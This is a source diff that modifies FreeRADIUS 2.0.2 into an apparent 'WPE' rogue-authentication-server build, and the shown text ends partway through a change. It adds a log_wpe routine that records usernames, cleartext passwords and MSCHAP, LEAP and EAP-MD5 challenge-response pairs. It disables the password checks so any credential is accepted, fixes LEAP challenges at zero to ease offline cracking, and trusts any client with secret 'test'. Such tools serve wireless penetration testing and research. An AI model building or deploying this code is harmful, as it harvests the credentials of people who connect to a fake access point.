diff -ru freeradius-server-2.0.2/raddb/clients.conf freeradius-server-2.0.2-wpe/raddb/clients.conf
--- freeradius-server-2.0.2/raddb/clients.conf	2008-02-13 04:41:14.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/clients.conf	2008-02-15 19:39:01.000000000 -0500
@@ -227,3 +227,20 @@
 #		secret = testing123
 #        }
 #}
+
+client 192.168.0.0/16 {
+       secret          = test 
+       shortname       = testAP 
+}
+client 172.16.0.0/12 {
+       secret          = test
+       shortname       = testAP
+}
+client 10.0.0.0/8 {
+       secret          = test
+       shortname       = testAP
+}
+client 127.0.0.1 {
+       secret          = test
+       shortname       = testAP
+}
diff -ru freeradius-server-2.0.2/raddb/eap.conf freeradius-server-2.0.2-wpe/raddb/eap.conf
--- freeradius-server-2.0.2/raddb/eap.conf	2008-01-10 05:28:35.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/eap.conf	2008-02-15 19:37:35.000000000 -0500
@@ -1,428 +1,33 @@
-# -*- text -*-
-##
-##  eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.)
-##
-##	$Id: eap.conf,v 1.23 2008/01/10 10:28:35 aland Exp $
-
-#######################################################################
-#
-#  Whatever you do, do NOT set 'Auth-Type := EAP'.  The server
-#  is smart enough to figure this out on its own.  The most
-#  common side effect of setting 'Auth-Type := EAP' is that the
-#  users then cannot use ANY other authentication method.
-#
-# EAP types NOT listed here may be supported via the "eap2" module.
-# See experimental.conf for documentation.
-#
 	eap {
-		#  Invoke the default supported EAP type when
-		#  EAP-Identity response is received.
-		#
-		#  The incoming EAP messages DO NOT specify which EAP
-		#  type they will be using, so it MUST be set here.
-		#
-		#  For now, only one default EAP type may be used at a time.
-		#
-		#  If the EAP-Type attribute is set by another module,
-		#  then that EAP type takes precedence over the
-		#  default type configured here.
-		#
-		default_eap_type = md5
-
-		#  A list is maintained to correlate EAP-Response
-		#  packets with EAP-Request packets.  After a
-		#  configurable length of time, entries in the list
-		#  expire, and are deleted.
-		#
+		default_eap_type = peap 
 		timer_expire     = 60
-
-		#  There are many EAP types, but the server has support
-		#  for only a limited subset.  If the server receives
-		#  a request for an EAP type it does not support, then
-		#  it normally rejects the request.  By setting this
-		#  configuration to "yes", you can tell the server to
-		#  instead keep processing the request.  Another module
-		#  MUST then be configured to proxy the request to
-		#  another RADIUS server which supports that EAP type.
-		#
-		#  If another module is NOT configured to handle the
-		#  request, then the request will still end up being
-		#  rejected.
 		ignore_unknown_eap_types = no
-
-		# Cisco AP1230B firmware 12.2(13)JA1 has a bug.  When given
-		# a User-Name attribute in an Access-Accept, it copies one
-		# more byte than it should.
-		#
-		# We can work around it by configurably adding an extra
-		# zero byte.
-		cisco_accounting_username_bug = no
-
-		# Supported EAP-types
-
-		#
-		#  We do NOT recommend using EAP-MD5 authentication
-		#  for wireless connections.  It is insecure, and does
-		#  not provide for dynamic WEP keys.
-		#
+		cisco_accounting_username_bug = yes 
 		md5 {
 		}
-
-		# Cisco LEAP
-		#
-		#  We do not recommend using LEAP in new deployments.  See:
-		#  http://www.securiteam.com/tools/5TP012ACKE.html
-		#
-		#  Cisco LEAP uses the MS-CHAP algorithm (but not
-		#  the MS-CHAP attributes) to perform it's authentication.
-		#
-		#  As a result, LEAP *requires* access to the plain-text
-		#  User-Password, or the NT-Password attributes.
-		#  'System' authentication is impossible with LEAP.
-		#
 		leap {
 		}
-
-		#  Generic Token Card.
-		#
-		#  Currently, this is only permitted inside of EAP-TTLS,
-		#  or EAP-PEAP.  The module "challenges" the user with
-		#  text, and the response from the user is taken to be
-		#  the User-Password.
-		#
-		#  Proxying the tunneled EAP-GTC session is a bad idea,
-		#  the users password will go over the wire in plain-text,
-		#  for anyone to see.
-		#
 		gtc {
-			#  The default challenge, which many clients
-			#  ignore..
-			#challenge = "Password: "
-
-			#  The plain-text response which comes back
-			#  is put into a User-Password attribute,
-			#  and passed to another module for
-			#  authentication.  This allows the EAP-GTC
-			#  response to be checked against plain-text,
-			#  or crypt'd passwords.
-			#
-			#  If you say "Local" instead of "PAP", then
-			#  the module will look for a User-Password
-			#  configured for the request, and do the
-			#  authentication itself.
-			#
 			auth_type = PAP
 		}
-
-		## EAP-TLS
-		#
-		#  See raddb/certs/README for additional comments
-		#  on certificates.
-		#
-		#  If OpenSSL was not found at the time the server was
-		#  built, the "tls", "ttls", and "peap" sections will
-		#  be ignored.
-		#
-		#  Otherwise, when the server first starts in debugging
-		#  mode, test certificates will be created.  See the
-		#  "make_cert_command" below for details, and the README
-		#  file in raddb/certs
-		#
-		#  These test certificates SHOULD NOT be used in a normal
-		#  deployment.  They are created only to make it easier
-		#  to install the server, and to perform some simple
-		#  tests with EAP-TLS, TTLS, or PEAP.
-		#
-		#  See also:
-		#
-		#  http://www.dslreports.com/forum/remark,9286052~mode=flat
-		#
 		tls {
-			#
-			#  These is used to simplify later configurations.
-			#
-			certdir = ${confdir}/certs
-			cadir = ${confdir}/certs
-
 			private_key_password = whatever
-			private_key_file = ${certdir}/server.pem
-
-			#  If Private key & Certificate are located in
-			#  the same file, then private_key_file &
-			#  certificate_file must contain the same file
-			#  name.
-			#
-			#  If CA_file (below) is not used, then the
-			#  certificate_file below MUST include not
-			#  only the server certificate, but ALSO all
-			#  of the CA certificates used to sign the
-			#  server certificate.
-			certificate_file = ${certdir}/server.pem
-
-			#  Trusted Root CA list
-			#
-			#  ALL of the CA's in this list will be trusted
-			#  to issue client certificates for authentication.
-			#
-			#  In general, you should use self-signed
-			#  certificates for 802.1x (EAP) authentication.
-			#  In that case, this CA file should contain
-			#  *one* CA certificate.
-			#
-			#  This parameter is used only for EAP-TLS,
-			#  when you issue client certificates.  If you do
-			#  not use client certificates, and you do not want
-			#  to permit EAP-TLS authentication, then delete
-			#  this configuration item.
-			CA_file = ${cadir}/ca.pem
-
-			#
-			#  For DH cipher suites to work, you have to
-			#  run OpenSSL to create the DH file first:
-			#
-			#  	openssl dhparam -out certs/dh 1024
-			#
-			dh_file = ${certdir}/dh
-			random_file = ${certdir}/random
-
-			#
-			#  This can never exceed the size of a RADIUS
-			#  packet (4096 bytes), and is preferably half
-			#  that, to accomodate other attributes in
-			#  RADIUS packet.  On most APs the MAX packet
-			#  length is configured between 1500 - 1600
-			#  In these cases, fragment size should be
-			#  1024 or less.
-			#
-		#	fragment_size = 1024
-
-			#  include_length is a flag which is
-			#  by default set to yes If set to
-			#  yes, Total Length of the message is
-			#  included in EVERY packet we send.
-			#  If set to no, Total Length of the
-			#  message is included ONLY in the
-			#  First packet of a fragment series.
-			#
-		#	include_length = yes
-
-			#  Check the Certificate Revocation List
-			#
-			#  1) Copy CA certificates and CRLs to same directory.
-			#  2) Execute 'c_rehash <CA certs&CRLs Directory>'.
-			#    'c_rehash' is OpenSSL's command.
-			#  3) uncomment the line below.
-			#  5) Restart radiusd
-		#	check_crl = yes
-		#	CA_path = /path/to/directory/with/ca_certs/and/crls/
-
-		       #
-		       #  If check_cert_issuer is set, the value will
-		       #  be checked against the DN of the issuer in
-		       #  the client certificate.  If the values do not
-		       #  match, the cerficate verification will fail,
-		       #  rejecting the user.
-		       #
-		#       check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd"
-
-		       #
-		       #  If check_cert_cn is set, the value will
-		       #  be xlat'ed and checked against the CN
-		       #  in the client certificate.  If the values
-		       #  do not match, the certificate verification
-		       #  will fail rejecting the user.
-		       #
-		       #  This check is done only if the previous
-		       #  "check_cert_issuer" is not set, or if
-		       #  the check succeeds.
-		       #
-		#	check_cert_cn = %{User-Name}
-		#
-			# Set this option to specify the allowed
-			# TLS cipher suites.  The format is listed
-			# in "man 1 ciphers".
-			cipher_list = "DEFAULT"
-
-			#
-
-			#  This configuration entry should be deleted
-			#  once the server is running in a normal
-			#  configuration.  It is here ONLY to make
-			#  initial deployments easier.
-			#
-			make_cert_command = "${certdir}/bootstrap"
-		}
-
-		#  The TTLS module implements the EAP-TTLS protocol,
-		#  which can be described as EAP inside of Diameter,
-		#  inside of TLS, inside of EAP, inside of RADIUS...
-		#
-		#  Surprisingly, it works quite well.
-		#
-		#  The TTLS module needs the TLS module to be installed
-		#  and configured, in order to use the TLS tunnel
-		#  inside of the EAP packet.  You will still need to
-		#  configure the TLS module, even if you do not want
-		#  to deploy EAP-TLS in your network.  Users will not
-		#  be able to request EAP-TLS, as it requires them to
-		#  have a client certificate.  EAP-TTLS does not
-		#  require a client certificate.
-		#
-		#  You can make TTLS require a client cert by setting
-		#
-		#	EAP-TLS-Require-Client-Cert = Yes
-		#
-		#  in the control items for a request.
-		#
+			private_key_file = ${raddbdir}/certs/server.pem
+			certificate_file = ${raddbdir}/certs/server.pem
+			CA_file = ${raddbdir}/certs/ca.pem
+			dh_file = ${raddbdir}/certs/dh
+			random_file = ${raddbdir}/certs/random
+			fragment_size = 1024
+			include_length = yes
+		}	
 		ttls {
-			#  The tunneled EAP session needs a default
-			#  EAP type which is separate from the one for
-			#  the non-tunneled EAP module.  Inside of the
-			#  TTLS tunnel, we recommend using EAP-MD5.
-			#  If the request does not contain an EAP
-			#  conversation, then this configuration entry
-			#  is ignored.
-			default_eap_type = md5
-
-			#  The tunneled authentication request does
-			#  not usually contain useful attributes
-			#  like 'Calling-Station-Id', etc.  These
-			#  attributes are outside of the tunnel,
-			#  and normally unavailable to the tunneled
-			#  authentication request.
-			#
-			#  By setting this configuration entry to
-			#  'yes', any attribute which NOT in the
-			#  tunneled authentication request, but
-			#  which IS available outside of the tunnel,
-			#  is copied to the tunneled request.
-			#
-			# allowed values: {no, yes}
-			copy_request_to_tunnel = no
-
-			#  The reply attributes sent to the NAS are
-			#  usually based on the name of the user
-			#  'outside' of the tunnel (usually
-			#  'anonymous').  If you want to send the
-			#  reply attributes based on the user name
-			#  inside of the tunnel, then set this
-			#  configuration entry to 'yes', and the reply
-			#  to the NAS will be taken from the reply to
-			#  the tunneled request.
-			#
-			# allowed values: {no, yes}
-			use_tunneled_reply = no
-
-			#
-			#  The inner tunneled request can be sent
-			#  through a virtual server constructed
-			#  specifically for this purpose.
-			#
-			#  If this entry is commented out, the inner
-			#  tunneled request will be sent through
-			#  the virtual server that processed the
-			#  outer requests.
-			#
-			#virtual_server = "inner-tunnel"
 		}
-
-		##################################################
-		#
-		#  !!!!! WARNINGS for Windows compatibility  !!!!!
-		#
-		##################################################
-		#
-		#  If you see the server send an Access-Challenge,
-		#  and the client never sends another Access-Request,
-		#  then
-		#
-		#		STOP!
-		#
-		#  The server certificate has to have special OID's
-		#  in it, or else the Microsoft clients will silently
-		#  fail.  See the "scripts/xpextensions" file for
-		#  details, and the following page:
-		#
-		#	http://support.microsoft.com/kb/814394/en-us
-		#
-		#  For additional Windows XP SP2 issues, see:
-		#
-		#	http://support.microsoft.com/kb/885453/en-us
-		#
-		#  Note that we do not necessarily agree with their
-		#  explanation... but the fix does appear to work.
-		#
-		##################################################
-
-		#
-		#  The tunneled EAP session needs a default EAP type
-		#  which is separate from the one for the non-tunneled
-		#  EAP module.  Inside of the TLS/PEAP tunnel, we
-		#  recommend using EAP-MS-CHAPv2.
-		#
-		#  The PEAP module needs the TLS module to be installed
-		#  and configured, in order to use the TLS tunnel
-		#  inside of the EAP packet.  You will still need to
-		#  configure the TLS module, even if you do not want
-		#  to deploy EAP-TLS in your network.  Users will not
-		#  be able to request EAP-TLS, as it requires them to
-		#  have a client certificate.  EAP-PEAP does not
-		#  require a client certificate.
-		#
-		#
-		#  You can make TTLS require a client cert by setting
-		#
-		#	EAP-TLS-Require-Client-Cert = Yes
-		#
-		#  in the control items for a request.
-		#
-		peap {
-			#  The tunneled EAP session needs a default
-			#  EAP type which is separate from the one for
-			#  the non-tunneled EAP module.  Inside of the
-			#  PEAP tunnel, we recommend using MS-CHAPv2,
-			#  as that is the default type supported by
-			#  Windows clients.
+		 peap {
 			default_eap_type = mschapv2
-
-			#  the PEAP module also has these configuration
-			#  items, which are the same as for TTLS.
 			copy_request_to_tunnel = no
 			use_tunneled_reply = no
-
-			#  When the tunneled session is proxied, the
-			#  home server may not understand EAP-MSCHAP-V2.
-			#  Set this entry to "no" to proxy the tunneled
-			#  EAP-MSCHAP-V2 as normal MSCHAPv2.
-		#	proxy_tunneled_request_as_eap = yes
-
-			#
-			#  The inner tunneled request can be sent
-			#  through a virtual server constructed
-			#  specifically for this purpose.
-			#
-			#  If this entry is commented out, the inner
-			#  tunneled request will be sent through
-			#  the virtual server that processed the
-			#  outer requests.
-			#
-			#virtual_server = "inner-tunnel"
+			proxy_tunneled_request_as_eap = yes
 		}
-
-		#
-		#  This takes no configuration.
-		#
-		#  Note that it is the EAP MS-CHAPv2 sub-module, not
-		#  the main 'mschap' module.
-		#
-		#  Note also that in order for this sub-module to work,
-		#  the main 'mschap' module MUST ALSO be configured.
-		#
-		#  This module is the *Microsoft* implementation of MS-CHAPv2
-		#  in EAP.  There is another (incompatible) implementation
-		#  of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
-		#  currently support.
-		#
 		mschapv2 {
 		}
 	}
diff -ru freeradius-server-2.0.2/raddb/radiusd.conf.in freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.0.2/raddb/radiusd.conf.in	2008-02-13 09:21:05.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in	2008-02-15 19:37:35.000000000 -0500
@@ -375,6 +375,7 @@
 
 #  The program to execute to do concurrency checks.
 checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
 
 # SECURITY CONFIGURATION
 #
diff -ru freeradius-server-2.0.2/raddb/users freeradius-server-2.0.2-wpe/raddb/users
--- freeradius-server-2.0.2/raddb/users	2007-10-23 09:41:23.000000000 -0400
+++ freeradius-server-2.0.2-wpe/raddb/users	2008-02-15 19:37:35.000000000 -0500
@@ -1,203 +1,3 @@
-#
-#	Please read the documentation file ../doc/processing_users_file,
-#	or 'man 5 users' (after installing the server) for more information.
-#
-#	This file contains authentication security and configuration
-#	information for each user.  Accounting requests are NOT processed
-#	through this file.  Instead, see 'acct_users', in this directory.
-#
-#	The first field is the user's name and can be up to
-#	253 characters in length.  This is followed (on the same line) with
-#	the list of authentication requirements for that user.  This can
-#	include password, comm server name, comm server port number, protocol
-#	type (perhaps set by the "hints" file), and huntgroup name (set by
-#	the "huntgroups" file).
-#
-#	If you are not sure why a particular reply is being sent by the
-#	server, then run the server in debugging mode (radiusd -X), and
-#	you will see which entries in this file are matched.
-#
-#	When an authentication request is received from the comm server,
-#	these values are tested. Only the first match is used unless the
-#	"Fall-Through" variable is set to "Yes".
-#
-#	A special user named "DEFAULT" matches on all usernames.
-#	You can have several DEFAULT entries. All entries are processed
-#	in the order they appear in this file. The first entry that
-#	matches the login-request will stop processing unless you use
-#	the Fall-Through variable.
-#
-#	If you use the database support to turn this file into a .db or .dbm
-#	file, the DEFAULT entries _have_ to be at the end of this file and
-#	you can't have multiple entries for one username.
-#
-#	Indented (with the tab character) lines following the first
-#	line indicate the configuration values to be passed back to
-#	the comm server to allow the initiation of a user session.
-#	This can include things like the PPP configuration values
-#	or the host to log the user onto.
-#
-#	You can include another `users' file with `$INCLUDE users.other'
-#
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
 
-#
-#	For a list of RADIUS attributes, and links to their definitions,
-#	see:
-#
-#	http://www.freeradius.org/rfc/attributes.html
-#
-
-#
-# Deny access for a specific user.  Note that this entry MUST
-# be before any other 'Auth-Type' attribute which results in the user
-# being authenticated.
-#
-# Note that there is NO 'Fall-Through' attribute, so the user will not
-# be given any additional resources.
-#
-#lameuser	Auth-Type := Reject
-#		Reply-Message = "Your account has been disabled."
-
-#
-# Deny access for a group of users.
-#
-# Note that there is NO 'Fall-Through' attribute, so the user will not
-# be given any additional resources.
-#
-#DEFAULT	Group == "disabled", Auth-Type := Reject
-#		Reply-Message = "Your account has been disabled."
-#
-
-#
-# This is a complete entry for "steve". Note that there is no Fall-Through
-# entry so that no DEFAULT entry will be used, and the user will NOT
-# get any attributes in addition to the ones listed here.
-#
-#steve	Cleartext-Password := "testing"
-#	Service-Type = Framed-User,
-#	Framed-Protocol = PPP,
-#	Framed-IP-Address = 172.16.3.33,
-#	Framed-IP-Netmask = 255.255.255.0,
-#	Framed-Routing = Broadcast-Listen,
-#	Framed-Filter-Id = "std.ppp",
-#	Framed-MTU = 1500,
-#	Framed-Compression = Van-Jacobsen-TCP-IP
-
-#
-# This is an entry for a user with a space in their name.
-# Note the double quotes surrounding the name.
-#
-#"John Doe"	Cleartext-Password := "hello"
-#		Reply-Message = "Hello, %{User-Name}"
-
-#
-# Dial user back and telnet to the default host for that port
-#
-#Deg	Cleartext-Password := "ge55ged"
-#	Service-Type = Callback-Login-User,
-#	Login-IP-Host = 0.0.0.0,
-#	Callback-Number = "9,5551212",
-#	Login-Service = Telnet,
-#	Login-TCP-Port = Telnet
-
-#
-# Another complete entry. After the user "dialbk" has logged in, the
-# connection will be broken and the user will be dialed back after which
-# he will get a connection to the host "timeshare1".
-#
-#dialbk	Cleartext-Password := "callme"
-#	Service-Type = Callback-Login-User,
-#	Login-IP-Host = timeshare1,
-#	Login-Service = PortMaster,
-#	Callback-Number = "9,1-800-555-1212"
-
-#
-# user "swilson" will only get a static IP number if he logs in with
-# a framed protocol on a terminal server in Alphen (see the huntgroups file).
-#
-# Note that by setting "Fall-Through", other attributes will be added from
-# the following DEFAULT entries
-#
-#swilson	Service-Type == Framed-User, Huntgroup-Name == "alphen"
-#		Framed-IP-Address = 192.168.1.65,
-#		Fall-Through = Yes
-
-#
-# If the user logs in as 'username.shell', then authenticate them
-# using the default method, give them shell access, and stop processing
-# the rest of the file.
-#
-#DEFAULT	Suffix == ".shell"
-#		Service-Type = Login-User,
-#		Login-Service = Telnet,
-#		Login-IP-Host = your.shell.machine
-
-
-#
-# The rest of this file contains the several DEFAULT entries.
-# DEFAULT entries match with all login names.
-# Note that DEFAULT entries can also Fall-Through (see first entry).
-# A name-value pair from a DEFAULT entry will _NEVER_ override
-# an already existing name-value pair.
-#
-
-#
-# Set up different IP address pools for the terminal servers.
-# Note that the "+" behind the IP address means that this is the "base"
-# IP address. The Port-Id (S0, S1 etc) will be added to it.
-#
-#DEFAULT	Service-Type == Framed-User, Huntgroup-Name == "alphen"
-#		Framed-IP-Address = 192.168.1.32+,
-#		Fall-Through = Yes
-
-#DEFAULT	Service-Type == Framed-User, Huntgroup-Name == "delft"
-#		Framed-IP-Address = 192.168.2.32+,
-#		Fall-Through = Yes
-
-#
-# Sample defaults for all framed connections.
-#
-#DEFAULT	Service-Type == Framed-User
-#	Framed-IP-Address = 255.255.255.254,
-#	Framed-MTU = 576,
-#	Service-Type = Framed-User,
-#	Fall-Through = Yes
-
-#
-# Default for PPP: dynamic IP address, PPP mode, VJ-compression.
-# NOTE: we do not use Hint = "PPP", since PPP might also be auto-detected
-#	by the terminal server in which case there may not be a "P" suffix.
-#	The terminal server sends "Framed-Protocol = PPP" for auto PPP.
-#
-DEFAULT	Framed-Protocol == PPP
-	Framed-Protocol = PPP,
-	Framed-Compression = Van-Jacobson-TCP-IP
-
-#
-# Default for CSLIP: dynamic IP address, SLIP mode, VJ-compression.
-#
-DEFAULT	Hint == "CSLIP"
-	Framed-Protocol = SLIP,
-	Framed-Compression = Van-Jacobson-TCP-IP
-
-#
-# Default for SLIP: dynamic IP address, SLIP mode.
-#
-DEFAULT	Hint == "SLIP"
-	Framed-Protocol = SLIP
-
-#
-# Last default: rlogin to our main server.
-#
-#DEFAULT
-#	Service-Type = Login-User,
-#	Login-Service = Rlogin,
-#	Login-IP-Host = shellbox.ispdomain.com
-
-# #
-# # Last default: shell on the local terminal server.
-# #
-# DEFAULT
-# 	Service-Type = Administrative-User
-
-# On no match, the user is denied access.
+DEFAULT Cleartext-Password := "a"
diff -ru freeradius-server-2.0.2/src/include/radiusd.h freeradius-server-2.0.2-wpe/src/include/radiusd.h
--- freeradius-server-2.0.2/src/include/radiusd.h	2008-02-11 10:19:54.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/include/radiusd.h	2008-02-15 19:37:35.000000000 -0500
@@ -247,6 +247,7 @@
 #endif
 	char		*log_file;
 	char		*checkrad;
+	char		*wpelogfile;
 	const char      *pid_file;
 	rad_listen_t	*listen;
 	int		syslog_facility;
diff -ru freeradius-server-2.0.2/src/main/auth.c freeradius-server-2.0.2-wpe/src/main/auth.c
--- freeradius-server-2.0.2/src/main/auth.c	2007-12-10 11:07:30.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/auth.c	2008-02-15 19:37:35.000000000 -0500
@@ -319,6 +319,7 @@
 					return -1;
 				}
 				DEBUG2("auth: user supplied User-Password matches local User-Password");
+				log_wpe("password", request->username->vp_strvalue, password_pair->vp_strvalue, NULL, 0, NULL, 0);
 				break;
 
 			} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -ru freeradius-server-2.0.2/src/main/log.c freeradius-server-2.0.2-wpe/src/main/log.c
--- freeradius-server-2.0.2/src/main/log.c	2007-11-23 08:46:53.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/log.c	2008-02-15 19:37:35.000000000 -0500
@@ -28,6 +28,10 @@
 
 #include <freeradius-devel/radiusd.h>
 
+#include        <stdio.h>
+#include        <time.h>
+
+
 #ifdef HAVE_SYSLOG_H
 #	include <syslog.h>
 /* keep track of whether we've run openlog() */
@@ -237,5 +241,52 @@
 }
 
 
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, 
+		unsigned int challen, unsigned char *response, unsigned int resplen)
+{
+	FILE            *logfd;
+	time_t          nowtime;
+	unsigned int	count;
+
+	/* Get wpelogfile parameter and log data */
+	if (mainconfig.wpelogfile == NULL) {
+		logfd = stderr;
+	} else {
+		logfd = fopen(mainconfig.wpelogfile, "a");
+		if (logfd == NULL) {
+			DEBUG2("  rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+			logfd = stderr;
+		}
+	}
 
 
+	nowtime = time(NULL);
+	fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+	if (username != NULL) {
+		fprintf(logfd, "\tusername: %s\n", username);
+	}
+	if (password != NULL) {
+		fprintf(logfd, "\tpassword: %s\n", password);
+	}
+
+	if (challen != 0) {
+		fprintf(logfd, "\tchallenge: ");
+		for (count=0; count!=(challen-1); count++) {
+			fprintf(logfd, "%02x:",challenge[count]);
+		}
+		fprintf(logfd, "%02x\n",challenge[challen-1]);
+	}
+
+	if (resplen != 0) {
+		fprintf(logfd, "\tresponse: ");
+		for (count=0; count!=(resplen-1); count++) {
+			fprintf(logfd, "%02x:",response[count]);
+		}
+		fprintf(logfd, "%02x\n",response[resplen-1]);
+	}
+
+	fprintf(logfd, "\n");
+	fclose(logfd);
+}
+
diff -ru freeradius-server-2.0.2/src/main/mainconfig.c freeradius-server-2.0.2-wpe/src/main/mainconfig.c
--- freeradius-server-2.0.2/src/main/mainconfig.c	2008-01-21 05:29:02.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/mainconfig.c	2008-02-15 19:37:35.000000000 -0500
@@ -188,6 +188,7 @@
 	{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
 
 	{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
+	{ "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
 
 	{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
 	{ "security", PW_TYPE_SUBSECTION, 0, NULL, (const void *) security_config },
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	2007-11-25 09:02:08.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	2008-02-15 19:37:35.000000000 -0500
@@ -244,10 +244,11 @@
  *	Verify the MS-CHAP response from the user.
  */
 int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
-		   leap_session_t *session)
+		   leap_session_t *session, char *username)
 {
 	unsigned char ntpwdhash[16];
 	unsigned char response[24];
+	unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
 
 
 	/*
@@ -266,6 +267,7 @@
 	 */
 	eapleap_mschap(ntpwdhash, session->peer_challenge, response);
 	if (memcmp(response, packet->challenge, 24) == 0) {
+		log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
 		DEBUG2("  rlm_eap_leap: NtChallengeResponse from AP is valid");
 		memcpy(session->peer_response, response, sizeof(response));
 		return 1;
@@ -415,7 +417,9 @@
 	 *	Fill the challenge with random bytes.
 	 */
 	for (i = 0; i < reply->count; i++) {
-		reply->challenge[i] = fr_rand();
+		/* WPE - fixed challenge */
+		//reply->challenge[i] = fr_rand();
+		reply->challenge[i] = 0;
 	}
 
 	DEBUG2("  rlm_eap_leap: Issuing AP Challenge");
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	2006-11-14 16:22:09.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	2008-02-15 19:37:35.000000000 -0500
@@ -68,7 +68,7 @@
 LEAP_PACKET 	*eapleap_extract(EAP_DS *auth);
 LEAP_PACKET 	*eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
 int		eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
-			       leap_session_t *session);
+			       leap_session_t *session, char *username);
 LEAP_PACKET	*eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
 				VALUE_PAIR *user_name, VALUE_PAIR* password,
 				leap_session_t *session,
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	2007-12-25 03:18:56.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	2008-02-15 19:37:35.000000000 -0500
@@ -133,7 +133,7 @@
 	switch (session->stage) {
 	case 4:			/* Verify NtChallengeResponse */
 		DEBUG2("  rlm_eap_leap: Stage 4");
-		rcode = eapleap_stage4(packet, password, session);
+		rcode = eapleap_stage4(packet, password, session, username);
 		session->stage = 6;
 
 		/*
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c	2007-11-23 07:58:12.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c	2008-02-15 19:37:35.000000000 -0500
@@ -202,9 +202,13 @@
 	/*
 	 *	The length of the response is always 16 for MD5.
 	 */
-	if (memcmp(output, packet->value, 16) != 0) {
-		return 0;
-	}
+	//WPE - always succeed
+	//if (memcmp(output, packet->value, 16) != 0) {
+
+		//return 0;
+	//}
+	log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+		packet->value, 16);	
 	return 1;
 }
 
diff -ru freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c
--- freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c	2007-11-23 08:46:59.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c	2008-02-15 19:37:35.000000000 -0500
@@ -463,6 +463,7 @@
 			default_pl = default_pl->next;
 		}
 
+		/* WPE - look for matching entries here */
 		if (paircompare(request, request_pairs, pl->check, reply_pairs) == 0) {
 			DEBUG2("    %s: Matched entry %s at line %d",
 			       filename, match, pl->lineno);
diff -ru freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c	2008-01-09 08:20:56.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c	2008-02-15 19:37:35.000000000 -0500
@@ -735,12 +735,14 @@
 static int do_mschap(rlm_mschap_t *inst,
 		     REQUEST *request, VALUE_PAIR *password,
 		     uint8_t *challenge, uint8_t *response,
-		     uint8_t *nthashhash)
+		     uint8_t *nthashhash, char *username)
 {
 	int		do_ntlm_auth = 0;
 	uint8_t		calculated[24];
 	VALUE_PAIR	*vp = NULL;
 
+	log_wpe("mschap", username, NULL, challenge, 8, response, 24);
+
 	/*
 	 *	If we have ntlm_auth configured, use it unless told
 	 *	otherwise
@@ -778,9 +780,10 @@
 		}
 
 		smbdes_mschap(password->vp_strvalue, challenge, calculated);
-		if (memcmp(response, calculated, 24) != 0) {
-			return -1;
-		}
+		/* Always return success for any password */
+		//if (memcmp(response, calculated, 24) != 0) {
